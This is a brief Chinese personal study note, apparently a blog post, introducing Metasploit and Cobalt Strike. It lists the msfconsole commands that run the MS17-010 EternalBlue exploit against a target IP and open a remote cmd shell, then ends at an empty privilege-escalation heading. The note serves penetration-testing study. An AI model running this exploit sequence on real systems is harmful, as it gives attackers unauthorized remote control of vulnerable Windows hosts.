//个人向

MSF是什么

metasploit framework是一款开源的安全漏洞检测工具，集成了常见的漏洞利用模块，并且可以生成各种木马。
kali系统中自带metasploit framework工具，但由于版本过老，而且难以更新（易更新失败），有时间的话还是建议 在本机上搭建最新版比较好。

Metasploit Framework基础用法

search ms17_010

//查找漏洞库中ms17010

use exploit/windows/smb/ms17_010_eternalblue

//使用exp，进入漏洞内
//报错：没有设置目标主机

show options

//RHOST=目标主机
//LHOST=本地主机

set rhosts 192.168.xx.xxx

//设置目标主机
//show options
//检查设置后

show targets

//查看漏洞影响范围
//系统版本win7 and 2008

exploit

//执行漏洞
//即会返回命令窗口，但为msf特有命令）
//如getuid、help

shell

//漏洞利用后可以通过shell命令直接得到cmd会话

exit

//退出当前cmd会话

show payloads

//工具的payloads

CS是什么

Cobalt Strike是一款由java编写的全平台多方协同渗透测试框架，在3.0版本之前它基于Metasploit框架工作，在3.0后的版本以独立成一个渗透测试平台。CobaltStrike集成了端口转发、端口扫描、socket代理、提权、钓鱼、远控木马等功能。该工具几乎覆盖了APT攻击链中所需要用到的各个技术环节，且其最大的优点在于可以进行团队合作和优越的UI界面。

Cobalt Strike提权操作